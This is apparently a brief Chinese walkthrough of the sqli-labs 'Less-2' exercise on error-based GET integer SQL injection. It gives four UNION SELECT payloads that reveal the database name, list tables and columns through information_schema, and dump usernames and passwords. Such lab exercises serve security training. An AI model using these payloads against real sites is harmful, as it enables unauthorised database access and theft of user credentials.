Less-2错误型GET整型注入
什么是整形注入?可以理解位提交的URL参数为整数类型。
实验漏洞复现介绍
该实验与Less-1错误型GET单引号字符型注入 区别在于,构建payload时去掉'单引号
1、爆开数据库
payload
?id=0 union select 1,2,database() --+2、爆开数据表
payload
?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+3、表开数据列(字段)
payload
?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+4、爆开数据值
payload
?id=0 union select 1,group_concat(username,0x3a,password),3 from users--+